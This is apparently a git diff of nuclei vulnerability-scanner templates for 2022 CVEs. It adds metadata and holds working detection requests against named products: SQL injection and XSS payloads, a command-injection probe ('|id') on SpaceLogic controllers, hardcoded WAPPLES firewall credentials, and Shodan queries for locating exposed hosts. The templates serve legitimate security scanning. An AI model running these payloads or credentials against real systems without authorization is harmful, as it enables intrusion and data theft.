SQL injection if untrusted data is used as a kind/lookup_name value. Applications that constrain the lookup name and kind choice to a known safe list are unaffected. - reference: - - https://github.com/vulhub/vulhub/tree/master/django/CVE-2022-34265 - - https://nvd.nist.gov/vuln/detail/CVE-2022-34265 - - https://www.djangoproject.com/weblog/2022/jul/04/security-releases/ - - https://docs.djangoproject.com/en/4.0/releases/security/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-34265 - cwe-id: CWE-89 - tags: sqli,dast,vulhub,cve,cve2022,django - -variables: - rand_string: '{{rand_text_alpha(15, "abc")}}' - -http: - - method: GET - path: - - "{{BaseURL}}" - - fuzzing: - - part: query - fuzz: - - "test'{{rand_string}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'syntax error at or near "{{rand_string}}"' - - 'LINE 1: SELECT DATE_TRUNC' - condition: and - - - type: status - status: - - 500 diff --git a/nuclei-templates/CVE-2022/CVE-2022-34328.yaml b/nuclei-templates/CVE-2022/CVE-2022-34328.yaml index 68443dab7f..0cb67471d4 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-34328.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-34328.yaml @@ -6,21 +6,33 @@ info: severity: medium description: | PMB 7.3.10 contains a reflected cross-site scripting vulnerability via the id parameter in an lvl=author_see request to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of PMB. reference: - https://github.com/jenaye/PMB/blob/main/README.md - https://github.com/jenaye/PMB - https://nvd.nist.gov/vuln/detail/CVE-2022-34328 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-34328 cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36967 + cpe: cpe:2.3:a:sigb:pmb:7.3.10:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: sigb + product: pmb shodan-query: http.html:"PMB Group" - verified: "true" - tags: cve,cve2022,pmb,xss + tags: cve,cve2022,pmb,xss,pmb_project -requests: +http: - method: GET path: - "{{BaseURL}}/index.php?lvl=author_see&id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" @@ -40,5 +52,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 +# digest: 490a0046304402206bde39b421fc0dbe953ff2bb4c4414dd18a118d11c1854e21a49bfefa62df3f2022009445f47a0e787a6922487a2834e6903d60e5f80936db25397d553943d744fc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-34576.yaml b/nuclei-templates/CVE-2022/CVE-2022-34576.yaml index 2ba3da4c7d..77c1005781 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-34576.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-34576.yaml @@ -6,19 +6,32 @@ info: severity: high description: | WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to improper access control. A vulnerability in /cgi-bin/ExportAllSettings.sh allows an attacker to execute arbitrary code via a crafted POST request and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the network. + remediation: | + Apply the latest firmware update provided by the vendor to fix the access control issue. reference: - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3_Sensitive%20information%20leakage.md - https://nvd.nist.gov/vuln/detail/CVE-2022-34576 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/tr3ss/gofetch classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-34576 + epss-score: 0.03075 + epss-percentile: 0.90796 + cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wn535g3_firmware shodan-query: http.html:"Wavlink" - verified: "true" tags: cve,cve2022,wavlink,exposure -requests: +http: - method: GET path: - "{{BaseURL}}/cgi-bin/ExportAllSettings.sh" @@ -36,5 +49,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/03 +# digest: 490a00463044022008737e106e5c8fe1e9e117f6bc57f005c3fb3b9810552455947f1568b74df85a022016b0f75b1b14036e1e8e1ce246588f322c3dbd791bc9db34ffead55bef452f8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-34590.yaml b/nuclei-templates/CVE-2022/CVE-2022-34590.yaml index 639c5dc346..7ff5fdfdac 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-34590.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-34590.yaml @@ -6,20 +6,33 @@ info: severity: high description: | Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/admin.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/Renrao/bug_report/blob/master/blob/main/vendors/itsourcecode.com/hospital-management-system/sql_injection.md - https://nvd.nist.gov/vuln/detail/CVE-2022-34590 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/StarCrossPortal/scalpel classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2022-34590 cwe-id: CWE-89 + epss-score: 0.01429 + epss-percentile: 0.86269 + cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: hospital_management_system_project + product: hospital_management_system shodan-query: http.html:"Hospital Management System" - verified: "true" - tags: cve,cve2022,hms,cms,sqli + tags: cve,cve2022,hms,cms,sqli,hospital_management_system_project -requests: +http: - raw: - | POST /hms/admin/ HTTP/1.1 @@ -30,7 +43,7 @@ requests: host-redirects: true max-redirects: 2 - cookie-reuse: true + matchers-condition: and matchers: - type: word @@ -44,5 +57,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/09/28 +# digest: 490a004630440220508a25e53992f71a0c0e1613f1df75afea7314115bd57f3048e91c9fc36ddf3802207ce3526546e9caca6a5e12a9b26fc0687f38a8f928ff84e751c99d5677ba4114:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-34753.yaml b/nuclei-templates/CVE-2022/CVE-2022-34753.yaml index 519fe2218b..1124ffaca8 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-34753.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-34753.yaml @@ -1,26 +1,37 @@ id: CVE-2022-34753 info: - name: SpaceLogic C-Bus Home Controller - Remote Code Execution + name: SpaceLogic C-Bus Home Controller <=1.31.460 - Remote Command Execution author: gy741 severity: high description: | - A CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability exists that could cause remote root exploit when the command is compromised. Affected Products SpaceLogic C-Bus Home Controller (5200WHC2), formerly known as C-Bus Wiser Homer Controller MK2 (V1.31.460 and prior) + SpaceLogic C-Bus Home Controller through 1.31.460 is susceptible to remote command execution via improper neutralization of special elements. Remote root exploit can be enabled when the command is compromised, and an attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. + remediation: | + Upgrade SpaceLogic C-Bus Home Controller to a version higher than 1.31.460 to mitigate this vulnerability. reference: - https://www.zeroscience.mk/codes/SpaceLogic.txt - - https://nvd.nist.gov/vuln/detail/CVE-2022-34753 - https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf - http://packetstormsecurity.com/files/167783/Schneider-Electric-SpaceLogic-C-Bus-Home-Controller-5200WHC2-Remote-Root.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-34753 + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-34753 cwe-id: CWE-78 + epss-score: 0.96923 + epss-percentile: 0.99698 + cpe: cpe:2.3:o:schneider-electric:spacelogic_c-bus_home_controller_firmware:*:*:*:*:*:*:*:* metadata: + max-request: 1 + vendor: schneider-electric + product: spacelogic_c-bus_home_controller_firmware shodan-query: html:"SpaceLogic C-Bus" - tags: cve,cve2022,iot,spacelogic,rce,oast,packetstorm + tags: cve2022,cve,iot,spacelogic,rce,oast,packetstorm,schneider-electric -requests: +http: - raw: - | GET /delsnap.pl?name=|id HTTP/1.1 @@ -36,3 +47,4 @@ requests: - type: status status: - 200 +# digest: 490a0046304402204b51d243c97f21fcb85beb1f317c06aee7975d29df11fb1cee0c2956fe0fd65b02204299ce2ca6106775b89d507ffec1d69bf0c776615de752889c3ebcc81abf06d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-3484.yaml b/nuclei-templates/CVE-2022/CVE-2022-3484.yaml index 447388d541..8a6ae307d9 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-3484.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-3484.yaml @@ -6,20 +6,32 @@ info: severity: medium description: | WordPress wpb-show-core plugin through TODO contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and potential compromise of the affected WordPress website. + remediation: | + Update to the latest version of the WPB Show Core plugin, which includes a fix for the XSS vulnerability. reference: - https://wpscan.com/vulnerability/3afaed61-6187-4915-acf0-16e79d5c2464 - https://nvd.nist.gov/vuln/detail/CVE-2022-3484 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-3484 cwe-id: CWE-79 + epss-score: 0.00119 + epss-percentile: 0.45981 + cpe: cpe:2.3:a:wpb_show_core_project:wpb_show_core:-:*:*:*:*:wordpress:*:* metadata: verified: true + max-request: 1 + vendor: wpb_show_core_project + product: wpb_show_core + framework: wordpress google-query: inurl:wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php - tags: wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss,wpb-show-core + tags: cve,cve2022,wpscan,wp-plugin,wp,wordpress,xss,wpb-show-core,wpb_show_core_project -requests: +http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' @@ -32,5 +44,4 @@ requests: - 'contains(body, "wpb_jplayer_setting")' - 'contains(body, "")' condition: and - -# Enhanced by md on 2022/12/13 +# digest: 490a0046304402201a749cdffd411187ddb33010e8f5216620153b04b07fa73fc4fc631a83f40fb2022002510fd3818a0349b4e36bb35d207c52445a1777f8df6d4ef0baf5cb38af6080:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-3506.yaml b/nuclei-templates/CVE-2022/CVE-2022-3506.yaml index be43c1c809..d6fd9106bc 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-3506.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-3506.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | WordPress Related Posts plugin prior to 2.1.3 contains a cross-site scripting vulnerability in the rp4wp[heading_text] parameter. User input is not properly sanitized, allowing the insertion of arbitrary code that can allow an attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement. + remediation: | + Update to the latest version of the WordPress Related Posts plugin (2.1.3 or higher) to mitigate the vulnerability. reference: - https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828/ - https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828 @@ -16,11 +20,18 @@ info: cvss-score: 5.4 cve-id: CVE-2022-3506 cwe-id: CWE-79 + epss-score: 0.00135 + epss-percentile: 0.48543 + cpe: cpe:2.3:a:never5:related_posts:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wordpress,wp,wp-plugin,relatedposts,cve,cve2022,xss,authenticated,huntr + verified: true + max-request: 4 + vendor: never5 + product: related_posts + framework: wordpress + tags: cve2022,cve,wordpress,wp,wp-plugin,relatedposts,xss,authenticated,huntr,never5 -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -28,28 +39,23 @@ requests: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/options-general.php?page=rp4wp HTTP/1.1 Host: {{Hostname}} - - | POST /wp-admin/options.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded option_page=rp4wp&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=3&rp4wp%5Bheading_text%5D=%22+autofocus+onfocus%3Dalert%28document.domain%29%3E&rp4wp%5Bexcerpt_length%5D=15&rp4wp%5Bcss%5D=.rp4wp-related-posts+ul%7Bwidth%3A100%25%3Bpadding%3A0%3Bmargin%3A0%3Bfloat%3Aleft%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%7Blist-style%3Anone%3Bpadding%3A0%3Bmargin%3A0%3Bpadding-bottom%3A20px%3Bclear%3Aboth%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%3Ep%7Bmargin%3A0%3Bpadding%3A0%3B%7D%0D%0A.rp4wp-related-post-image%7Bwidth%3A35%25%3Bpadding-right%3A25px%3B-moz-box-sizing%3Aborder-box%3B-webkit-box-sizing%3Aborder-box%3Bbox-sizing%3Aborder-box%3Bfloat%3Aleft%3B%7D - - | GET /wp-admin/options-general.php?page=rp4wp&settings-updated=true HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true - req-condition: true matchers: - type: dsl dsl: - - "contains(all_headers_4, 'text/html')" + - "contains(header_4, 'text/html')" - "status_code_4 == 200" - 'contains(body_4, "value=\"\" autofocus onfocus=alert(document.domain)>")' - "contains(body_4, 'The amount of automatically')" @@ -58,10 +64,9 @@ requests: extractors: - type: regex name: nonce - part: body group: 1 regex: - 'name="_wpnonce" value="([0-9a-z]+)" />' internal: true - -# Enhanced by md on 2022/12/13 + part: body +# digest: 490a004630440220183c07929c3a6fa76dbd9ae9c9682952d3b03b59c1ff34cf40687d299cfb671b022070f05c9efb0883a2b4afd38a695f1868ab9b6e7d4d0a3356e1fc0e8be2a02643:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-35151.yaml b/nuclei-templates/CVE-2022/CVE-2022-35151.yaml index 199aaeadd9..04519a5b18 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-35151.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-35151.yaml @@ -6,20 +6,33 @@ info: severity: medium description: | kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement. + remediation: | + To mitigate this vulnerability, it is recommended to update kkFileView to the latest version or apply a patch provided by the vendor. reference: - https://github.com/kekingcn/kkFileView/issues/366 - https://nvd.nist.gov/vuln/detail/CVE-2022-35151 + - https://github.com/StarCrossPortal/scalpel + - https://github.com/anonymous364872/Rapier_Tool + - https://github.com/youcans896768/APIV_Tool classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-35151 cwe-id: CWE-79 + epss-score: 0.02148 + epss-percentile: 0.8906 + cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: keking + product: kkfileview shodan-query: http.html:"kkFileView" - verified: "true" - tags: cve,cve2022,xss,kkfileview + tags: cve,cve2022,xss,kkfileview,keking -requests: +http: - raw: - | GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1 @@ -42,5 +55,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 +# digest: 4b0a00483046022100ea88299ec85fb50b4a362a8e064bc821fb7715a7759f1eeca4e1cf413f0660ed022100fe6573babba0d9c0edfa96f41ecf1d52e2520195df629fdc83d76427c3b9eef7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-35405.yaml b/nuclei-templates/CVE-2022/CVE-2022-35405.yaml index 2da0529eff..b93c5d5cd7 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-35405.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-35405.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | Zoho ManageEngine Password Manager Pro, PAM 360, and Access Manager Plus are susceptible to unauthenticated remote code execution via XML-RPC. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + Apply the latest security patch or update provided by Zoho ManageEngine to fix the vulnerability. reference: - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/zoho_password_manager_pro_xml_rpc_rce.rb - https://xz.aliyun.com/t/11578 @@ -16,36 +20,25 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-35405 + cwe-id: CWE-502 + epss-score: 0.97471 + epss-percentile: 0.99962 + cpe: cpe:2.3:a:zohocorp:manageengine_access_manager_plus:*:*:*:*:*:*:*:* metadata: + max-request: 1 + vendor: zohocorp + product: manageengine_access_manager_plus shodan-query: http.title:"ManageEngine" - tags: cve,cve2022,rce,zoho,passwordmanager,deserialization,unauth,msf,kev + tags: cve,cve2022,rce,zoho,passwordmanager,deserialization,unauth,msf,kev,zohocorp -requests: +http: - method: POST path: - "{{RootURL}}/xmlrpc" - body: | - {{randstr}}big0us - - - method: POST - path: - - "{{RootURL}}:8282/xmlrpc" - body: | - {{randstr}}big0us - - - method: POST - path: - - "{{RootURL}}:9292/xmlrpc" - body: | - {{randstr}}big0us - - method: POST - path: - - "{{RootURL}}:7272/xmlrpc" body: | - {{randstr}}big0us + {{randstr}}big0us - stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -66,5 +59,4 @@ requests: - "" - "" condition: or - -# Enhanced by mp on 2022/10/06 +# digest: 4a0a00473045022100c58308205018e15f25ac2f7d5c893f96e4824a583109c18b69b936c1d0a70a2b022071a1f6412c2a7b759bc7b80ca525682bca892b4f239f9c1dd42aa27dafc7221e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-35413.yaml b/nuclei-templates/CVE-2022/CVE-2022-35413.yaml index 4aa84e7310..6dd5baad96 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-35413.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-35413.yaml @@ -6,22 +6,33 @@ info: severity: critical description: | WAPPLES Web Application Firewall through 6.0 contains a hardcoded credentials vulnerability. It contains a hardcoded system account accessible via db/wp.no1, as configured in the /opt/penta/wapples/script/wcc_auto_scaling.py file. An attacker can use this account to access system configuration and confidential information, such as SSL keys, via an HTTPS request to the /webapi/ URI on port 443 or 5001. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the WAPPLES Web Application Firewall. + remediation: | + Upgrade to a version of WAPPLES Web Application Firewall that does not contain hardcoded credentials or apply the vendor-provided patch to fix the vulnerability. reference: - https://medium.com/@_sadshade/wapples-web-application-firewall-multiple-vulnerabilities-35bdee52c8fb - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35413 - https://azuremarketplace.microsoft.com/en/marketplace/apps/penta-security-systems-inc.wapples_sa_v6?tab=Overview - https://nvd.nist.gov/vuln/detail/CVE-2022-35413 + - https://www.pentasecurity.com/product/wapples/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-35413 cwe-id: CWE-798 + epss-score: 0.72077 + epss-percentile: 0.97989 + cpe: cpe:2.3:a:pentasecurity:wapples:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: pentasecurity + product: wapples shodan-query: http.title:"Intelligent WAPPLES" - verified: "true" - tags: cve,cve2022,wapples,firewall,default-login + tags: cve,cve2022,wapples,firewall,default-login,pentasecurity -requests: +http: - raw: - | POST /webapi/auth HTTP/1.1 @@ -30,12 +41,12 @@ requests: id={{username}}&password={{password}} - attack: pitchfork payloads: username: - systemi password: - db/wp.no1 + attack: pitchfork matchers-condition: and matchers: @@ -54,5 +65,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/01/06 +# digest: 4b0a00483046022100d7f00c85b2fc013d012ffbc1aface3dba29af2e1702bddfc66c8cbcdc3352788022100f55effaa808713faa5ad79ed9524db463132d5e31bdde0eba82aeaf965d12818:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-35493.yaml b/nuclei-templates/CVE-2022/CVE-2022-35493.yaml index 8bc76eaa74..592dc3e926 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-35493.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-35493.yaml @@ -6,20 +6,32 @@ info: severity: medium description: | eShop 3.0.4 contains a reflected cross-site scripting vulnerability in json search parse and json response in wrteam.in. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the website. + remediation: | + To remediate this issue, the application should implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://github.com/Keyvanhardani/Exploit-eShop-Multipurpose-Ecommerce-Store-Website-3.0.4-Cross-Site-Scripting-XSS/blob/main/README.md - https://nvd.nist.gov/vuln/detail/CVE-2022-35493 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Keyvanhardani/Exploit-eShop-Multipurpose-Ecommerce-Store-Website-3.0.4-Cross-Site-Scripting-XSS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-35493 cwe-id: CWE-79 + epss-score: 0.00157 + epss-percentile: 0.52174 + cpe: cpe:2.3:a:wrteam:eshop_-_ecommerce_\/_store_website:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wrteam + product: eshop_-_ecommerce_\/_store_website shodan-query: http.html:"eShop - Multipurpose Ecommerce" - verified: "true" - tags: cve,cve2022,eshop,xss + tags: cve,cve2022,eshop,xss,wrteam -requests: +http: - method: GET path: - '{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E' @@ -38,5 +50,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 +# digest: 4a0a0047304502202a6133499f5d377e9c10cce1deaaa1b80217ec22156f69d6175a9b958321a8d502210085ca957af87670643c6aed09bf0156a4c37519c0b98b77050dcbca0b85e8b814:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-35653.yaml b/nuclei-templates/CVE-2022/CVE-2022-35653.yaml index e4f15b3e5a..022fbc4de6 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-35653.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-35653.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-35653 cwe-id: CWE-79 - epss-score: 0.00685 - epss-percentile: 0.77784 + epss-score: 0.00921 + epss-percentile: 0.82544 cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* metadata: verified: true @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bcc6a90986f149fabb6251387893b90150bf8bf348e8b2e9f302c19543f3a46e022100afd6b814a6b55dc423ce861b6ad493870cc0c7975f4da5eb4df6aa9d70dd923d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022004b941fe0c29e3e5d82693bdb719e8d8bf0d20abade4a23f07f9a6f83c96c49e02201aeae2d265a2fa845153049b513dbfcbef5d317b1d289064871fdd40cc17f5c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-3578.yaml b/nuclei-templates/CVE-2022/CVE-2022-3578.yaml index e45ba3bf0c..f235f695f9 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-3578.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-3578.yaml @@ -6,20 +6,32 @@ info: severity: medium description: | WordPress ProfileGrid plugin prior to 5.1.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. + remediation: | + Update WordPress ProfileGrid to version 5.1.1 or later to mitigate the XSS vulnerability. reference: - https://wpscan.com/vulnerability/17596b0e-ff45-4d0c-8e57-a31101e30345 - https://wordpress.org/plugins/profilegrid-user-profiles-groups-and-communities/ - https://nvd.nist.gov/vuln/detail/CVE-2022-3578 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-3578 cwe-id: CWE-79 + epss-score: 0.00119 + epss-percentile: 0.45981 + cpe: cpe:2.3:a:metagauss:profilegrid:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wp-plugin,wordpress,wpscan,cve,wp,xss,profilegrid,authenticated,cve2022 + verified: true + max-request: 2 + vendor: metagauss + product: profilegrid + framework: wordpress + tags: cve,cve2022,wp-plugin,wordpress,wpscan,wp,xss,profilegrid,authenticated,metagauss -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -27,20 +39,16 @@ requests: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/admin.php?page=pm_add_group&id=">&tab")' condition: and - -# Enhanced by md on 2022/12/13 +# digest: 4b0a00483046022100dd995de30ddd471912eccf3b1c9747f357455709c02fff57a2ae72242063cfb6022100cf266425327b75e1aa894d7acfd50ae332dcda54311cd37251e9aecaed629c17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-35914.yaml b/nuclei-templates/CVE-2022/CVE-2022-35914.yaml index 706f623aa0..00d4ea6869 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-35914.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-35914.yaml @@ -1,40 +1,30 @@ id: CVE-2022-35914 info: - name: GLPI <=10.0.2 - Remote Command Execution + name: GLPI - Remote Code Execution author: For3stCo1d severity: critical description: | - GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system. - remediation: | - Upgrade GLPI to a version higher than 10.0.2 to mitigate this vulnerability. + /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module for GLPI through 10.0.2 allows PHP code injection. reference: - https://mayfly277.github.io/posts/GLPI-htmlawed-CVE-2022-35914 - https://github.com/cosad3s/CVE-2022-35914-poc - - http://www.bioinformatics.org/phplabware/sourceer/sourceer.php?&Sfs=htmLawedTest.php&Sl=.%2Finternal_utilities%2FhtmLawed - https://nvd.nist.gov/vuln/detail/CVE-2022-35914 - - https://github.com/glpi-project/glpi/releases + - http://www.bioinformatics.org/phplabware/sourceer/sourceer.php?&Sfs=htmLawedTest.php&Sl=.%2Finternal_utilities%2FhtmLawed classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-35914 cwe-id: CWE-74 - epss-score: 0.97399 - epss-percentile: 0.99914 - cpe: 